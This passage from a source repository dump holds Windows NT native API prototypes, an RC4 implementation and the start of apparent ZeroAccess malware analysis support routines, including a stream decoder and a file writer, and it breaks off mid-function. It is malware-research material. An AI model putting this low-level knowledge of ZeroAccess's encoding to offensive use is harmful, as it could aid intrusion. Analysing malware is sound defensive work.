ObjectAttributes,\n\t_In_opt_\tPLARGE_INTEGER MaximumSize,\n\t_In_\t\tULONG SectionPageProtection,\n\t_In_\t\tULONG AllocationAttributes,\n\t_In_opt_\tHANDLE FileHandle\n\t);\n\nNTSTATUS NTAPI NtMapViewOfSection(\n\t_In_\t\tHANDLE SectionHandle,\n\t_In_\t\tHANDLE ProcessHandle,\n\t__inout\t\tPVOID *BaseAddress,\n\t_In_\t\tULONG_PTR ZeroBits,\n\t_In_\t\tSIZE_T CommitSize,\n\t_Inout_opt_ PLARGE_INTEGER SectionOffset,\n\t_Inout_\t\tPSIZE_T ViewSize,\n\t_In_\t\tSECTION_INHERIT InheritDisposition,\n\t_In_\t\tULONG AllocationType,\n\t_In_\t\tULONG Win32Protect\n\t);\n\nNTSTATUS NTAPI NtUnmapViewOfSection(\n\t_In_\tHANDLE ProcessHandle,\n\t_In_\tPVOID BaseAddress\n\t);\n\nNTSTATUS NTAPI NtOpenProcessToken(\n\t_In_\tHANDLE ProcessHandle,\n\t_In_\tACCESS_MASK DesiredAccess,\n\t_Out_\tPHANDLE TokenHandle\n\t);\n\n\nNTSTATUS NTAPI NtOpenThreadTokenEx(\n\t_In_ HANDLE ThreadHandle,\n\t_In_ ACCESS_MASK DesiredAccess,\n\t_In_ BOOLEAN OpenAsSelf,\n\t_In_ ULONG HandleAttributes,\n\t_Out_ PHANDLE TokenHandle\n\t);\n\nNTSTATUS NTAPI NtAdjustPrivilegesToken(\n\t_In_\t\tHANDLE TokenHandle,\n\t_In_\t\tBOOLEAN DisableAllPrivileges,\n\t_In_opt_\tPTOKEN_PRIVILEGES NewState,\n\t_In_opt_\tULONG BufferLength,\n\t_Out_opt_\tPTOKEN_PRIVILEGES PreviousState,\n\t_Out_opt_\tPULONG ReturnLength\n\t);\n\nNTSTATUS NTAPI NtQueryInformationToken(\n\t_In_\tHANDLE TokenHandle,\n\t_In_\tTOKEN_INFORMATION_CLASS TokenInformationClass,\n\t_Out_\tPVOID TokenInformation,\n\t_In_\tULONG TokenInformationLength,\n\t_Out_\tPULONG ReturnLength\n\t);\n\nNTSTATUS NTAPI NtOpenKey(\n\t_Out_\tPHANDLE KeyHandle,\n\t_In_\tACCESS_MASK DesiredAccess,\n\t_In_\tPOBJECT_ATTRIBUTES ObjectAttributes\n\t);\n\nNTSTATUS NTAPI NtQueryKey(\n\t_In_\t\tHANDLE KeyHandle,\n\t_In_\t\tKEY_INFORMATION_CLASS KeyInformationClass,\n\t_Out_opt_\tPVOID KeyInformation,\n\t_In_\t\tULONG Length,\n\t_Out_\t\tPULONG ResultLength\n\t);\n\nNTSTATUS NTAPI NtQueryValueKey(\n\t_In_ HANDLE KeyHandle,\n\t_In_ PUNICODE_STRING ValueName,\n\t_In_ KEY_VALUE_INFORMATION_CLASS KeyValueInformationClass,\n\t_Out_ PVOID KeyValueInformation,\n\t_In_ ULONG Length,\n\t_Out_ PULONG ResultLength\n\t);\n\nNTSTATUS NTAPI NtDeleteKey(\n\t_In_ HANDLE KeyHandle\n\t);\n\nNTSTATUS NTAPI NtDeleteValueKey(\n\t_In_ HANDLE KeyHandle,\n\t_In_ PUNICODE_STRING ValueName\n\t);\n\nNTSTATUS NTAPI NtOpenJobObject(\n\t_Out_\tPHANDLE JobHandle,\n\t_In_\tACCESS_MASK DesiredAccess,\n\t_In_\tPOBJECT_ATTRIBUTES ObjectAttributes\n\t);\n\nNTSTATUS NTAPI NtQueryInformationJobObject(\n\t_In_opt_\tHANDLE JobHandle,\n\t_In_\t\tJOBOBJECTINFOCLASS JobObjectInformationClass,\n\t_Out_\t\tPVOID JobObjectInformation,\n\t_In_\t\tULONG JobObjectInformationLength,\n\t_Out_opt_\tPULONG ReturnLength\n\t);\n\nNTSTATUS NTAPI NtOpenIoCompletion(\n\t_Out_\tPHANDLE IoCompletionHandle,\n\t_In_\tACCESS_MASK DesiredAccess,\n\t_In_\tPOBJECT_ATTRIBUTES ObjectAttributes\n\t);\n\nNTSTATUS NTAPI NtQueryIoCompletion(\n\t_In_\t\tHANDLE IoCompletionHandle,\n\t_In_\t\tIO_COMPLETION_INFORMATION_CLASS IoCompletionInformationClass,\n\t_Out_\t\tPVOID IoCompletionInformation,\n\t_In_\t\tULONG IoCompletionInformationLength,\n\t_Out_opt_\tPULONG ReturnLength\n\t);\n\nNTSTATUS NTAPI NtQueryInformationFile(\n\t_In_\tHANDLE FileHandle,\n\t_Out_\tPIO_STATUS_BLOCK IoStatusBlock,\n\t_Out_\tPVOID FileInformation,\n\t_In_\tULONG Length,\n\t_In_\tFILE_INFORMATION_CLASS FileInformationClass\n\t);\n\nNTSTATUS NTAPI NtFsControlFile(\n\t_In_ HANDLE FileHandle,\n\t_In_opt_ HANDLE Event,\n\t_In_opt_ PIO_APC_ROUTINE ApcRoutine,\n\t_In_opt_ PVOID ApcContext,\n\t_Out_ PIO_STATUS_BLOCK IoStatusBlock,\n\t_In_ ULONG FsControlCode,\n\t_In_ PVOID InputBuffer,\n\t_In_ ULONG InputBufferLength,\n\t_Out_ PVOID OutputBuffer,\n\t_In_ ULONG OutputBufferLength\n\t);\n\nNTSTATUS NTAPI NtQueryDirectoryFile(\n\t_In_ HANDLE FileHandle,\n\t_In_opt_ HANDLE Event,\n\t_In_opt_ PIO_APC_ROUTINE ApcRoutine,\n\t_In_opt_ PVOID ApcContext,\n\t_Out_ PIO_STATUS_BLOCK IoStatusBlock,\n\t_Out_ PVOID FileInformation,\n\t_In_ ULONG Length,\n\t_In_ FILE_INFORMATION_CLASS FileInformationClass,\n\t_In_ BOOLEAN ReturnSingleEntry,\n\t_In_opt_ PUNICODE_STRING FileName,\n\t_In_ BOOLEAN RestartScan\n\t);\n\nNTSTATUS NTAPI NtQueryEaFile(\n\t_In_ HANDLE FileHandle,\n\t_Out_ PIO_STATUS_BLOCK IoStatusBlock,\n\t__out_bcount(Length) PVOID Buffer,\n\t_In_ ULONG Length,\n\t_In_ BOOLEAN ReturnSingleEntry,\n\t__in_bcount_opt(EaListLength) PVOID EaList,\n\t_In_ ULONG EaListLength,\n\t_In_opt_ PULONG EaIndex,\n\t_In_ BOOLEAN RestartScan\n\t);\n\nNTSTATUS NTAPI NtSetEaFile(\n\t_In_ HANDLE FileHandle,\n\t_Out_ PIO_STATUS_BLOCK IoStatusBlock,\n\t__in_bcount(Length) PVOID Buffer,\n\t_In_ ULONG Length\n\t);\n\nNTSTATUS NTAPI NtQueryVolumeInformationFile(\n\t_In_ HANDLE FileHandle,\n\t_Out_ PIO_STATUS_BLOCK IoStatusBlock,\n\t_Out_ PVOID FsInformation,\n\t_In_ ULONG Length,\n\t_In_ FS_INFORMATION_CLASS FsInformationClass\n\t);\n\nNTSTATUS NTAPI NtOpenFile(\n\t_Out_\tPHANDLE FileHandle,\n\t_In_\tACCESS_MASK DesiredAccess,\n\t_In_\tPOBJECT_ATTRIBUTES ObjectAttributes,\n\t_Out_\tPIO_STATUS_BLOCK IoStatusBlock,\n\t_In_\tULONG ShareAccess,\n\t_In_\tULONG OpenOptions\n\t);\n\nNTSTATUS NTAPI NtReadFile(\n\t_In_ HANDLE FileHandle,\n\t_In_opt_ HANDLE Event,\n\t_In_opt_ PIO_APC_ROUTINE ApcRoutine,\n\t_In_opt_ PVOID ApcContext,\n\t_Out_ PIO_STATUS_BLOCK IoStatusBlock,\n\t__out_bcount(Length) PVOID Buffer,\n\t_In_ ULONG Length,\n\t_In_opt_ PLARGE_INTEGER ByteOffset,\n\t_In_opt_ PULONG Key\n\t);\n\nNTSTATUS NTAPI NtWriteFile(\n\t_In_ HANDLE FileHandle,\n\t_In_opt_ HANDLE Event,\n\t_In_opt_ PIO_APC_ROUTINE ApcRoutine,\n\t_In_opt_ PVOID ApcContext,\n\t_Out_ PIO_STATUS_BLOCK IoStatusBlock,\n\t_In_ PVOID Buffer,\n\t_In_ ULONG Length,\n\t_In_opt_ PLARGE_INTEGER ByteOffset,\n\t_In_opt_ PULONG Key\n\t);\n\nNTSTATUS NTAPI NtFlushBuffersFile(\n\t_In_ HANDLE FileHandle,\n\t_Out_ PIO_STATUS_BLOCK IoStatusBlock\n\t);\n\nNTSTATUS NTAPI NtSetInformationFile(\n\t_In_ HANDLE FileHandle,\n\t_Out_ PIO_STATUS_BLOCK IoStatusBlock,\n\t__in_bcount(Length) PVOID FileInformation,\n\t_In_ ULONG Length,\n\t_In_ FILE_INFORMATION_CLASS FileInformationClass\n\t);\n\nNTSTATUS NTAPI NtDeleteFile(\n\t_In_ POBJECT_ATTRIBUTES ObjectAttributes\n\t);\n\nNTSTATUS NTAPI NtOpenEvent(\n\t_Out_\tPHANDLE EventHandle,\n\t_In_\tACCESS_MASK DesiredAccess,\n\t_In_\tPOBJECT_ATTRIBUTES ObjectAttributes\n\t);\n\nNTSTATUS NTAPI NtOpenKeyedEvent(\n\t_Out_\tPHANDLE KeyedEventHandle,\n\t_In_\tACCESS_MASK DesiredAccess,\n\t_In_\tPOBJECT_ATTRIBUTES ObjectAttributes\n\t);\n\nNTSTATUS NTAPI NtOpenSemaphore(\n\t_Out_\tPHANDLE SemaphoreHandle,\n\t_In_\tACCESS_MASK DesiredAccess,\n\t_In_\tPOBJECT_ATTRIBUTES ObjectAttributes\n\t);\n\nNTSTATUS NTAPI NtQueryEvent(\n\t_In_\t\tHANDLE EventHandle,\n\t_In_\t\tEVENT_INFORMATION_CLASS EventInformationClass,\n\t_Out_\t\tPVOID EventInformation,\n\t_In_\t\tULONG EventInformationLength,\n\t_Out_opt_\tPULONG ReturnLength\n\t);\n\nNTSTATUS NTAPI NtOpenEventPair(\n\t_Out_\tPHANDLE EventPairHandle,\n\t_In_\tACCESS_MASK DesiredAccess,\n\t_In_\tPOBJECT_ATTRIBUTES ObjectAttributes\n\t);\n\n//TmTx\nNTSTATUS NTAPI NtCreateTransaction(\n\t_Out_ PHANDLE TransactionHandle,\n\t_In_ ACCESS_MASK DesiredAccess,\n\t_In_opt_ POBJECT_ATTRIBUTES ObjectAttributes,\n\t_In_opt_ LPGUID Uow,\n\t_In_opt_ HANDLE TmHandle,\n\t_In_opt_ ULONG CreateOptions,\n\t_In_opt_ ULONG IsolationLevel,\n\t_In_opt_ ULONG IsolationFlags,\n\t_In_opt_ PLARGE_INTEGER Timeout,\n\t_In_opt_ PUNICODE_STRING Description\n\t);\n\n//TmRm\nNTSTATUS NTAPINtCreateResourceManager(\n\t_Out_ PHANDLE ResourceManagerHandle,\n\t_In_ ACCESS_MASK DesiredAccess,\n\t_In_ HANDLE TmHandle,\n\t_In_opt_ LPGUID ResourceManagerGuid,\n\t_In_opt_ POBJECT_ATTRIBUTES ObjectAttributes,\n\t_In_opt_ ULONG CreateOptions,\n\t_In_opt_ PUNICODE_STRING Description\n\t);\n\n//TmEn\nNTSTATUS NTAPI NtCreateEnlistment(\n\t_Out_ PHANDLE EnlistmentHandle,\n\t_In_ ACCESS_MASK DesiredAccess,\n\t_In_ HANDLE ResourceManagerHandle,\n\t_In_ HANDLE TransactionHandle,\n\t_In_opt_ POBJECT_ATTRIBUTES ObjectAttributes,\n\t_In_opt_ ULONG CreateOptions,\n\t_In_ NOTIFICATION_MASK NotificationMask,\n\t_In_opt_ PVOID EnlistmentKey\n\t);\n\n//TmTm\nNTSTATUS NTAPI NtCreateTransactionManager(\n\t_Out_ PHANDLE TmHandle,\n\t_In_ ACCESS_MASK DesiredAccess,\n\t_In_opt_ POBJECT_ATTRIBUTES ObjectAttributes,\n\t_In_opt_ PUNICODE_STRING LogFileName,\n\t_In_opt_ ULONG CreateOptions,\n\t_In_opt_ ULONG CommitStrength\n\t);\n\nNTSTATUS NTAPI NtCreateFile(\n\t_Out_\t\tPHANDLE FileHandle,\n\t_In_\t\tACCESS_MASK DesiredAccess,\n\t_In_\t\tPOBJECT_ATTRIBUTES ObjectAttributes,\n\t_Out_\t\tPIO_STATUS_BLOCK IoStatusBlock,\n\t_In_opt_\tPLARGE_INTEGER AllocationSize,\n\t_In_\t\tULONG FileAttributes,\n\t_In_\t\tULONG ShareAccess,\n\t_In_\t\tULONG CreateDisposition,\n\t_In_\t\tULONG CreateOptions,\n\t_In_opt_\tPVOID EaBuffer,\n\t_In_\t\tULONG EaLength\n\t);\n\nNTSTATUS NTAPI NtOpenProcess(\n\t_Out_\t\tPHANDLE ProcessHandle,\n\t_In_\t\tACCESS_MASK DesiredAccess,\n\t_In_\t\tPOBJECT_ATTRIBUTES ObjectAttributes,\n\t_In_opt_\tPCLIENT_ID ClientId\n\t);\n\nNTSTATUS NTAPI NtTerminateProcess(\n\t_In_opt_\tHANDLE ProcessHandle,\n\t_In_\t\tNTSTATUS ExitStatus\n\t);\n\nNTSTATUS NTAPI NtSuspendThread(\n\t_In_\t\tHANDLE ThreadHandle,\n\t_Out_opt_\tPULONG PreviousSuspendCount\n\t);\n\nNTSTATUS NTAPI NtResumeThread(\n\t_In_\t\tHANDLE ThreadHandle,\n\t_Out_opt_\tPULONG PreviousSuspendCount\n\t);\n\nNTSTATUS NTAPI NtOpenThread(\n\t_Out_ PHANDLE ThreadHandle,\n\t_In_ ACCESS_MASK DesiredAccess,\n\t_In_ POBJECT_ATTRIBUTES ObjectAttributes,\n\t_In_opt_ PCLIENT_ID ClientId\n\t);\n\nNTSTATUS NTAPI NtImpersonateThread(\n\t_In_ HANDLE ServerThreadHandle,\n\t_In_ HANDLE ClientThreadHandle,\n\t_In_ PSECURITY_QUALITY_OF_SERVICE SecurityQos\n\t);\n\nNTSTATUS NTAPI NtSetContextThread(\n\t_In_ HANDLE ThreadHandle,\n\t_In_ PCONTEXT ThreadContext\n\t);\n\nNTSTATUS NTAPI NtGetContextThread(\n\t_In_ HANDLE ThreadHandle,\n\t_Inout_ PCONTEXT ThreadContext\n\t);\n\nNTSTATUS NTAPI NtQueryInformationProcess(\n\t_In_\t\tHANDLE ProcessHandle,\n\t_In_\t\tPROCESSINFOCLASS ProcessInformationClass,\n\t_Out_\t\tPVOID ProcessInformation,\n\t_In_\t\tULONG ProcessInformationLength,\n\t_Out_opt_\tPULONG ReturnLength\n\t);\n\nNTSTATUS NTAPI NtDuplicateObject(\n\t_In_\t\tHANDLE SourceProcessHandle,\n\t_In_\t\tHANDLE SourceHandle,\n\t_In_opt_\tHANDLE TargetProcessHandle,\n\t_Out_\t\tPHANDLE TargetHandle,\n\t_In_\t\tACCESS_MASK DesiredAccess,\n\t_In_\t\tULONG HandleAttributes,\n\t_In_\t\tULONG Options\n\t);\n\nNTSTATUS NTAPI NtSetSecurityObject(\n\t_In_\tHANDLE Handle,\n\t_In_\tSECURITY_INFORMATION SecurityInformation,\n\t_In_\tPSECURITY_DESCRIPTOR SecurityDescriptor\n\t);\n\nNTSTATUS NTAPI NtQuerySecurityObject(\n\t_In_\tHANDLE Handle,\n\t_In_\tSECURITY_INFORMATION SecurityInformation,\n\t_Out_\tPSECURITY_DESCRIPTOR SecurityDescriptor,\n\t_In_\tULONG Length,\n\t_Out_\tPULONG LengthNeeded\n\t);\n\nNTSTATUS NtCreateIoCompletion(\n\t_Out_\t\tPHANDLE IoCompletionHandle,\n\t_In_\t\tACCESS_MASK DesiredAccess,\n\t_In_opt_\tPOBJECT_ATTRIBUTES ObjectAttributes,\n\t_In_opt_\tULONG Count\n\t);\n\nNTSTATUS NTAPI NtCreateEvent(\n\t_Out_\t\tPHANDLE EventHandle,\n\t_In_\t\tACCESS_MASK DesiredAccess,\n\t_In_opt_\tPOBJECT_ATTRIBUTES ObjectAttributes,\n\t_In_\t\tEVENT_TYPE EventType,\n\t_In_\t\tBOOLEAN InitialState\n\t);\n\nNTSTATUS NTAPI NtAllocateVirtualMemory(\n\t_In_ HANDLE ProcessHandle,\n\t_Inout_ PVOID *BaseAddress,\n\t_In_ ULONG_PTR ZeroBits,\n\t_Inout_ PSIZE_T RegionSize,\n\t_In_ ULONG AllocationType,\n\t_In_ ULONG Protect\n\t);\n\nNTSTATUS NTAPI NtFreeVirtualMemory(\n\t_In_ HANDLE ProcessHandle,\n\t_Inout_ PVOID *BaseAddress,\n\t_Inout_ PSIZE_T RegionSize,\n\t_In_ ULONG FreeType\n\t);\n\nNTSTATUS NTAPI NtQueryVirtualMemory(\n\t_In_\t\tHANDLE ProcessHandle,\n\t_In_\t\tPVOID BaseAddress,\n\t_In_\t\tMEMORY_INFORMATION_CLASS MemoryInformationClass,\n\t_Out_\t\tPVOID MemoryInformation,\n\t_In_\t\tSIZE_T MemoryInformationLength,\n\t_Out_opt_\tPSIZE_T ReturnLength\n\t);\n\nNTSTATUS NTAPI NtReadVirtualMemory(\n\t_In_\t\tHANDLE ProcessHandle,\n\t_In_opt_\tPVOID BaseAddress,\n\t_Out_\t\tPVOID Buffer,\n\t_In_\t\tSIZE_T BufferSize,\n\t_Out_opt_\tPSIZE_T NumberOfBytesRead\n\t);\n\nNTSTATUS NTAPI NtWriteVirtualMemory(\n\t_In_ HANDLE ProcessHandle,\n\t_In_opt_ PVOID BaseAddress,\n\t_In_ VOID *Buffer,\n\t_In_ SIZE_T BufferSize,\n\t_Out_opt_ PSIZE_T NumberOfBytesWritten\n\t);\n\nNTSTATUS NTAPI NtProtectVirtualMemory(\n\t_In_ HANDLE ProcessHandle,\n\t_Inout_ PVOID *BaseAddress,\n\t_Inout_ PSIZE_T RegionSize,\n\t_In_ ULONG NewProtect,\n\t_Out_ PULONG OldProtect\n\t);\n\nNTSTATUS NTAPI NtEnumerateKey(\n\t_In_\t\tHANDLE KeyHandle,\n\t_In_\t\tULONG Index,\n\t_In_\t\tKEY_INFORMATION_CLASS KeyInformationClass,\n\t_Out_opt_\tPVOID KeyInformation,\n\t_In_\t\tULONG Length,\n\t_Out_\t\tPULONG ResultLength\n\t);\n\nNTSTATUS NTAPI NtCreatePort(\n\t_Out_\tPHANDLE PortHandle,\n\t_In_\tPOBJECT_ATTRIBUTES ObjectAttributes,\n\t_In_\tULONG MaxConnectionInfoLength,\n\t_In_\tULONG MaxMessageLength,\n\t_In_\tULONG MaxPoolUsage\n\t);\n\nNTSTATUS NTAPI NtCompleteConnectPort(\n\t_In_\tHANDLE PortHandle\n\t);\n\nNTSTATUS NTAPI NtListenPort(\n\t_In_\tHANDLE PortHandle,\n\t_Out_\tPPORT_MESSAGE ConnectionRequest\n\t);\n\nNTSTATUS NTAPI NtReplyPort(\n\t_In_\tHANDLE PortHandle,\n\t_In_\tPPORT_MESSAGE ReplyMessage\n\t);\n\nNTSTATUS NTAPI NtReplyWaitReplyPort(\n\t_In_\tHANDLE PortHandle,\n\t_Inout_\tPPORT_MESSAGE ReplyMessage\n\t);\n\nNTSTATUS NTAPI NtRequestPort(\n\t_In_\tHANDLE PortHandle,\n\t_In_\tPPORT_MESSAGE RequestMessage\n\t);\n\nNTSTATUS NTAPI NtRequestWaitReplyPort(\n\t_In_\tHANDLE PortHandle,\n\t_In_\tPPORT_MESSAGE RequestMessage,\n\t_Out_\tPPORT_MESSAGE ReplyMessage\n\t);\n\nNTSTATUS NTAPI NtClosePort(\n\t_In_\tHANDLE PortHandle\n\t);\n\nNTSTATUS NTAPI NtReplyWaitReceivePort(\n\t_In_\t\tHANDLE PortHandle,\n\t_Out_opt_\tPVOID *PortContext,\n\t_In_opt_\tPPORT_MESSAGE ReplyMessage,\n\t_Out_\t\tPPORT_MESSAGE ReceiveMessage\n\t);\n\nNTSTATUS NTAPI NtWriteRequestData(\n\t_In_\t\tHANDLE PortHandle,\n\t_In_\t\tPPORT_MESSAGE Message,\n\t_In_\t\tULONG DataEntryIndex,\n\t_In_\t\tPVOID Buffer,\n\t_In_\t\tULONG BufferSize,\n\t_Out_opt_\tPULONG NumberOfBytesWritten\n\t);\n\nNTSTATUS NTAPI NtReadRequestData(\n\t_In_\t\tHANDLE PortHandle,\n\t_In_\t\tPPORT_MESSAGE Message,\n\t_In_\t\tULONG DataEntryIndex,\n\t_Out_\t\tPVOID Buffer,\n\t_In_\t\tULONG BufferSize,\n\t_Out_opt_\tPULONG NumberOfBytesRead\n\t);\n\nNTSTATUS NTAPI NtConnectPort(\n\t_Out_\t\t\tPHANDLE PortHandle,\n\t_In_\t\t\tPUNICODE_STRING PortName,\n\t_In_\t\t\tPSECURITY_QUALITY_OF_SERVICE SecurityQos,\n\t_Inout_opt_\t\tPPORT_VIEW ClientView,\n\t_Out_opt_\t\tPREMOTE_PORT_VIEW ServerView,\n\t_Out_opt_\t\tPULONG MaxMessageLength,\n\t_Inout_opt_\t\tPVOID ConnectionInformation,\n\t_Inout_opt_\t\tPULONG ConnectionInformationLength\n\t);\n\nNTSTATUS NTAPI NtAcceptConnectPort(\n\t_Out_\t\t\tPHANDLE PortHandle,\n\t_In_opt_\t\tPVOID PortContext,\n\t_In_\t\t\tPPORT_MESSAGE ConnectionRequest,\n\t_In_\t\t\tBOOLEAN AcceptConnection,\n\t_Inout_opt_\t\tPPORT_VIEW ServerView,\n\t_Out_opt_\t\tPREMOTE_PORT_VIEW ClientView\n\t);\n"
},
{
"path": "Source/shared/rc4.c",
"content": "\n/*\n* rc4.c\n*\n* Copyright (c) 1996-2000 Whistle Communications, Inc.\n* All rights reserved.\n*\n* Subject to the following obligations and disclaimer of warranty, use and\n* redistribution of this software, in source or object code forms, with or\n* without modifications are expressly permitted by Whistle Communications;\n* provided, however, that:\n* 1. Any and all reproductions of the source or object code must include the\n* copyright notice above and the following disclaimer of warranties; and\n* 2. No rights are granted, in any manner or form, to use Whistle\n* Communications, Inc. trademarks, including the mark \"WHISTLE\n* COMMUNICATIONS\" on advertising, endorsements, or otherwise except as\n* such appears in the above copyright notice or in the software.\n*\n* THIS SOFTWARE IS BEING PROVIDED BY WHISTLE COMMUNICATIONS \"AS IS\", AND\n* TO THE MAXIMUM EXTENT PERMITTED BY LAW, WHISTLE COMMUNICATIONS MAKES NO\n* REPRESENTATIONS OR WARRANTIES, EXPRESS OR IMPLIED, REGARDING THIS SOFTWARE,\n* INCLUDING WITHOUT LIMITATION, ANY AND ALL IMPLIED WARRANTIES OF\n* MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE, OR NON-INFRINGEMENT.\n* WHISTLE COMMUNICATIONS DOES NOT WARRANT, GUARANTEE, OR MAKE ANY\n* REPRESENTATIONS REGARDING THE USE OF, OR THE RESULTS OF THE USE OF THIS\n* SOFTWARE IN TERMS OF ITS CORRECTNESS, ACCURACY, RELIABILITY OR OTHERWISE.\n* IN NO EVENT SHALL WHISTLE COMMUNICATIONS BE LIABLE FOR ANY DAMAGES\n* RESULTING FROM OR ARISING OUT OF ANY USE OF THIS SOFTWARE, INCLUDING\n* WITHOUT LIMITATION, ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY,\n* PUNITIVE, OR CONSEQUENTIAL DAMAGES, PROCUREMENT OF SUBSTITUTE GOODS OR\n* SERVICES, LOSS OF USE, DATA OR PROFITS, HOWEVER CAUSED AND UNDER ANY\n* THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT\n* (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF\n* THIS SOFTWARE, EVEN IF WHISTLE COMMUNICATIONS IS ADVISED OF THE POSSIBILITY\n* OF SUCH DAMAGE.\n*\n* $FreeBSD: src/sys/crypto/rc4/rc4.c,v 1.2.2.1 2000/04/18 04:48:31 archie Exp $\n*/\n\n#include \"rc4.h\"\n\nstatic __inline void\nswap_bytes(unsigned char *a, unsigned char *b)\n{\n\tunsigned char temp;\n\n\ttemp = *a;\n\t*a = *b;\n\t*b = temp;\n}\n\n/*\n* Initialize an RC4 state buffer using the supplied key,\n* which can have arbitrary length.\n*/\nvoid\nrc4_init(rc4_state *state, const unsigned char *key, unsigned long keylen)\n{\n\tunsigned char j = 0;\n\tunsigned long i;\n\n\t/* Initialize state with identity permutation */\n\tfor (i = 0; i < 256; i++)\n\t\tstate->perm[i] = (unsigned char)i;\n\tstate->index1 = 0;\n\tstate->index2 = 0;\n\n\t/* Randomize the permutation using key data */\n\tfor (i = 0; i < 256; i++) {\n\t\tj += state->perm[i] + key[i % keylen];\n\t\tswap_bytes(&state->perm[i], &state->perm[j]);\n\t}\n}\n\n/*\n* Encrypt some data using the supplied RC4 state buffer.\n* The input and output buffers may be the same buffer.\n* Since RC4 is a stream cypher, this function is used\n* for both encryption and decryption.\n*/\nvoid\nrc4_crypt(rc4_state *state,\n\tconst unsigned char *inbuf, unsigned char *outbuf, unsigned long buflen)\n{\n\tunsigned long i;\n\tunsigned char j;\n\n\tfor (i = 0; i < buflen; i++) {\n\n\t\t/* Update modification indicies */\n\t\tstate->index1++;\n\t\tstate->index2 += state->perm[state->index1];\n\n\t\t/* Modify permutation */\n\t\tswap_bytes(&state->perm[state->index1],\n\t\t\t&state->perm[state->index2]);\n\n\t\t/* Encrypt/decrypt next byte */\n\t\tj = state->perm[state->index1] + state->perm[state->index2];\n\t\toutbuf[i] = inbuf[i] ^ state->perm[j];\n\t}\n}\n"
},
{
"path": "Source/shared/rc4.h",
"content": "/*\n* rc4.h\n*\n* Copyright (c) 1996-2000 Whistle Communications, Inc.\n* All rights reserved.\n*\n* Subject to the following obligations and disclaimer of warranty, use and\n* redistribution of this software, in source or object code forms, with or\n* without modifications are expressly permitted by Whistle Communications;\n* provided, however, that:\n* 1. Any and all reproductions of the source or object code must include the\n* copyright notice above and the following disclaimer of warranties; and\n* 2. No rights are granted, in any manner or form, to use Whistle\n* Communications, Inc. trademarks, including the mark \"WHISTLE\n* COMMUNICATIONS\" on advertising, endorsements, or otherwise except as\n* such appears in the above copyright notice or in the software.\n*\n* THIS SOFTWARE IS BEING PROVIDED BY WHISTLE COMMUNICATIONS \"AS IS\", AND\n* TO THE MAXIMUM EXTENT PERMITTED BY LAW, WHISTLE COMMUNICATIONS MAKES NO\n* REPRESENTATIONS OR WARRANTIES, EXPRESS OR IMPLIED, REGARDING THIS SOFTWARE,\n* INCLUDING WITHOUT LIMITATION, ANY AND ALL IMPLIED WARRANTIES OF\n* MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE, OR NON-INFRINGEMENT.\n* WHISTLE COMMUNICATIONS DOES NOT WARRANT, GUARANTEE, OR MAKE ANY\n* REPRESENTATIONS REGARDING THE USE OF, OR THE RESULTS OF THE USE OF THIS\n* SOFTWARE IN TERMS OF ITS CORRECTNESS, ACCURACY, RELIABILITY OR OTHERWISE.\n* IN NO EVENT SHALL WHISTLE COMMUNICATIONS BE LIABLE FOR ANY DAMAGES\n* RESULTING FROM OR ARISING OUT OF ANY USE OF THIS SOFTWARE, INCLUDING\n* WITHOUT LIMITATION, ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY,\n* PUNITIVE, OR CONSEQUENTIAL DAMAGES, PROCUREMENT OF SUBSTITUTE GOODS OR\n* SERVICES, LOSS OF USE, DATA OR PROFITS, HOWEVER CAUSED AND UNDER ANY\n* THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT\n* (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF\n* THIS SOFTWARE, EVEN IF WHISTLE COMMUNICATIONS IS ADVISED OF THE POSSIBILITY\n* OF SUCH DAMAGE.\n*\n* $FreeBSD: src/sys/crypto/rc4/rc4.h,v 1.2.2.1 2000/04/18 04:48:32 archie Exp $\n*/\n\n#ifndef _SYS_CRYPTO_RC4_RC4_H_\n#define _SYS_CRYPTO_RC4_RC4_H_\n#pragma once\n\ntypedef struct _rc4_state {\n\tunsigned char\tperm[256];\n\tunsigned char\tindex1;\n\tunsigned char\tindex2;\n} rc4_state;\n\nextern void rc4_init(rc4_state *state, const unsigned char *key, unsigned long keylen);\nextern void rc4_crypt(rc4_state *state,\tconst unsigned char *inbuf, unsigned char *outbuf, unsigned long buflen);\n\n#endif\n"
},
{
"path": "Source/shared/util.c",
"content": "/*******************************************************************************\n*\n* (C) COPYRIGHT AUTHORS, 2016 - 2017\n*\n* TITLE: UTIL.C\n*\n* VERSION: 1.01\n*\n* DATE: 01 Dec 2017\n*\n* ZeroAccess support routines.\n*\n* THIS CODE AND INFORMATION IS PROVIDED \"AS IS\" WITHOUT WARRANTY OF\n* ANY KIND, EITHER EXPRESSED OR IMPLIED, INCLUDING BUT NOT LIMITED\n* TO THE IMPLIED WARRANTIES OF MERCHANTABILITY AND/OR FITNESS FOR A\n* PARTICULAR PURPOSE.\n*\n*******************************************************************************/\n\n#include \"global.h\"\n\n#pragma comment(lib, \"ws2_32.lib\")\n\n/*\n* SfuDecodeStream\n*\n* Purpose:\n*\n* Decode ZeroAccess stream using given key.\n*\n*/\nVOID SfuDecodeStream(\n _Inout_ unsigned char *stream,\n _In_ size_t size,\n _In_ unsigned long key\n)\n{\n unsigned long *p = (unsigned long *)stream;\n\n size >>= 2;\n while (size > 0) {\n *p ^= key;\n key = _rotl(key, 1);\n p++;\n size--;\n }\n}\n\n/*\n* SfuWriteBufferToFile\n*\n* Purpose:\n*\n* Create new file (or open existing) and write (append) buffer to it.\n*\n*/\nULONG_PTR SfuWriteBufferToFile(\n _In_ PWSTR lpFileName,\n _In_ PVOID Buffer,\n _In_ SIZE_T Size,\n _In_ BOOL Flush,\n _In_ BOOL Append\n)\n{\n NTSTATUS Status;\n DWORD dwFlag;\n HANDLE hFile = NULL;\n OBJECT_ATTRIBUTES attr;\n UNICODE_STRING NtFileName;\n IO_STATUS_BLOCK IoStatus;\n LARGE_INTEGER Position;\n ACCESS_MASK DesiredAccess;\n PLARGE_INTEGER pPosition = NULL;\n ULONG_PTR nBlocks, BlockIndex, BytesWritten = 0;\n ULONG BlockSize, RemainingSize;\n PBYTE ptr = (PBYTE)Buffer;\n\n if 